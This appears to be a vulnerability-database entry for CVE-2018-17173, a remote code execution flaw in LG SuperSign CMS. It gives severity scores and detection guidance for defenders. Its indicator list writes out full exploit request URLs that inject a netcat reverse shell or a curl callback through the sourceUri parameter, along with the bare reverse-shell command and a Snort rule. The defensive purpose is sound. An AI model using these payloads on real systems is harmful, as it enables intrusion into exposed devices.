cbcvebase.
CVE-2018-17173
published 2018-09-21

CVE-2018-17173: LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.

PriorityP190critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
56.24%
98.9th percentile
LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.

Affected

1 ranges
VendorProductVersion rangeFixed in
lgsupersign_cms

Detection & IOCsextracted from sources · hover to see the quote

port9080
path/qsr_server/device/getThumbnail
url/qsr_server/device/getThumbnail?sourceUri='%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20<lhost>%20<lport>%20%3E%2Ftmp%2Ff;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150
urlGET /qsr_server/device/getThumbnail?sourceUri=\'%2b-%253brm%2b/tmp/f%253bmkfifo%2b/tmp/f%253bcat%2b/tmp/f|/bin/sh%2b-i%2b2>%25261|curl%2bhttp%253a//{{interactsh-url}}%2b>/tmp/f%253b\';&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150 HTTP/1.1
commandrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <lhost> <lport> >/tmp/f
snort
alert http $EXTERNAL_NET any -> $HOME_NET 9080 (msg:"ET EXPLOIT Possible LG SuperSign EZ CMS 2.5 RCE (CVE-2018-17173)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/qsrserver/device/getThumbnail?sourceUri=|22|"; startswith; fast_pattern; content:"|3b|"; within:40; content:"&targetUri="; distance:0; content:"&scaleType="; distance:0; reference:url,www.exploit-db.com/exploits/45448; reference:cve,2018-17173; classtype:attempted-admin; sid:2027089; rev:6; metadata:attack_target IoT, created_at 2019_03_18, cve CVE_2018_17173, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, updated_at 2024_04_13;)
  • Exploit traffic targets TCP port 9080, which is the fixed default port for LG SuperSignEZ CMS. Restrict or monitor inbound HTTP to this port.
  • Detect GET requests to /qsr_server/device/getThumbnail (or /qsrserver/device/getThumbnail) containing a quote character in the sourceUri parameter followed by shell metacharacters (semicolons, pipe characters) and the &targetUri= and &scaleType= parameters.
  • The Mirai variant exploiting this CVE is detected as IoT.Linux.MIRAI.VWISI and uses XOR key 0x04 to encrypt embedded credentials.
  • Use FOFA query title="LG SuperSign" to identify exposed LG SuperSign CMS instances on the internet for asset discovery and attack surface reduction.
  • Trend Micro DDI rule 2865 specifically covers this CVE: '2865 - CVE-2018-17173 LG Supersign Remote Code Execution - HTTP (Request)'.
  • The exploit payload drops a named pipe at /tmp/f and spawns a reverse shell via /bin/sh piped through netcat. Monitor for creation of /tmp/f and anomalous netcat processes on LG WebOS-based devices.
  • ·The Snort/Suricata rule (ET sid:2027089) uses /qsrserver/ (no underscore) in the URI content match, while the actual exploit path in PoC code uses /qsr_server/ (with underscore). Ensure your detection covers both variants.
  • ·The Nuclei template uses an out-of-band interaction (interactsh) to confirm exploitation; it will not fire in environments without external DNS/HTTP callback visibility.
  • ·The Metasploit module defaults to payload 'cmd/unix/reverse_netcat', requiring netcat to be present on the target. Actual attacker payloads may differ.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.